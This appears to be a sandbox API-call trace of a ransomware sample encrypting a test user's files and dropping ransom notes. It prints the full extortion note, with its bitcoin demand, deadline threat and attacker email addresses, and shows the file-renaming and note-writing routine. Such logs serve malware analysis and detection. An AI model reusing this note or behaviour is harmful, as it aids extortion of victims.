	[0194.823] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c5e3283, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c5e3283, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c5e3283, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x74c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tcbfftgd3-w7dzc.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="TCBFFT~1.SCL")) returned 1
	[0194.823] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c62fa53, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c62fa53, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c62fa53, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5770, dwReserved0=0x0, dwReserved1=0x0, cFileName="ziwxnlovm1.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="ZIWXNL~1.SCL")) returned 1
	[0194.823] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c67bea4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c67bea4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c6ee4b5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zuujv6og4lf3pg.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="ZUUJV6~1.SCL")) returned 1
	[0194.823] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c67bea4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c67bea4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c6ee4b5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zuujv6og4lf3pg.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="ZUUJV6~1.SCL")) returned 0
	[0194.824] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0194.824] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0194.824] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0194.826] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891367b7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891367b7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b427c1d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0194.826] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891367b7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891367b7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b427c1d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0194.826] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b0e09c7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b0e09c7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b0e09c7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x3110, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hj3asnb2vn9lht8ucz.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HJ3ASN~1.SCL")) returned 1
	[0194.826] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b238b76, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b238b76, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b238b76, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x11040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="htfjvrtf5zhv-gvv.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HTFJVR~1.SCL")) returned 1
	[0194.827] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b2aa34a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b2aa34a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b2aa34a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x185d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pwnrgyqqhld5-c.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PWNRGY~1.SCL")) returned 1
	[0194.827] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b342d9f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b342d9f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b342d9f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x15610, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qtop1iy-c09.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="QTOP1I~1.SCL")) returned 1
	[0194.827] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b38f392, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b38f392, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b3b566a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_fz9pz08c.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Y_FZ9P~1.SCL")) returned 1
	[0194.827] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b38f392, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b38f392, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b3b566a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_fz9pz08c.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Y_FZ9P~1.SCL")) returned 0
	[0194.827] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0194.827] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0194.828] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1
	[0194.828] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1
	[0194.828] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1
	[0194.828] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0194.828] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0194.828] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="My Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents") returned="C:\\Users\\RDhJ0CNFevzX\\My Documents"
	[0194.828] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\My Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents") returned="C:\\Users\\RDhJ0CNFevzX\\My Documents"
	[0194.828] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\My Documents\\"
	[0194.829] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\My Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\My Documents\\"
	[0194.829] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\My Documents\\*.*"
	[0194.829] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\my documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b38f392, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b38f392, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b3b566a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_fz9pz08c.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Y_FZ9P~1.SCL")) returned 0xffffffff
	[0194.829] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0194.829] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\My Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents") returned="C:\\Users\\RDhJ0CNFevzX\\My Documents"
	[0194.830] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\My Documents\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\My Documents\\*.*"
	[0194.830] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.830] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.830] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\My Documents\\HELP_DECRYPT_YOUR_FILES.TXT") returned 62
	[0194.830] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\my documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0194.834] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0194.834] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0194.837] CloseHandle (hObject=0x380) returned 1
	[0194.837] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.837] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.837] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0194.839] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0194.839] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\my documents\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0194.839] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0194.839] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0194.839] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0194.840] CloseHandle (hObject=0x380) returned 1
	[0194.840] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.841] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.841] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0194.841] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\My Documents\\HELP_DECRYPT_YOUR_FILES.HTML") returned 63
	[0194.841] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\my documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0194.844] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0194.844] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0194.847] CloseHandle (hObject=0x380) returned 1
	[0194.847] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.847] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.848] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.848] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0194.849] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0194.849] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\my documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0194.850] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0194.850] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0194.850] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0194.850] CloseHandle (hObject=0x380) returned 1
	[0194.850] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\My Documents\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\my documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b38f392, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b38f392, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b3b566a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_fz9pz08c.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Y_FZ9P~1.SCL")) returned 0xffffffff
	[0194.851] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0194.851] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1
	[0194.851] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1
	[0194.851] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1
	[0194.851] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0194.851] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0194.851] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="NetHood" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood") returned="C:\\Users\\RDhJ0CNFevzX\\NetHood"
	[0194.852] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\NetHood" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood") returned="C:\\Users\\RDhJ0CNFevzX\\NetHood"
	[0194.852] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood\\") returned="C:\\Users\\RDhJ0CNFevzX\\NetHood\\"
	[0194.852] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\NetHood\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood\\") returned="C:\\Users\\RDhJ0CNFevzX\\NetHood\\"
	[0194.852] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\NetHood\\*.*"
	[0194.852] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\nethood\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b38f392, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8b38f392, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b3b566a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd430, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_fz9pz08c.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Y_FZ9P~1.SCL")) returned 0xffffffff
	[0194.852] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0194.852] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\NetHood" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood") returned="C:\\Users\\RDhJ0CNFevzX\\NetHood"
	[0194.853] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\NetHood\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\NetHood\\*.*"
	[0194.853] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0194.853] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0194.853] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\NetHood\\HELP_DECRYPT_YOUR_FILES.TXT") returned 57
	[0194.853] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NetHood\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\nethood\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
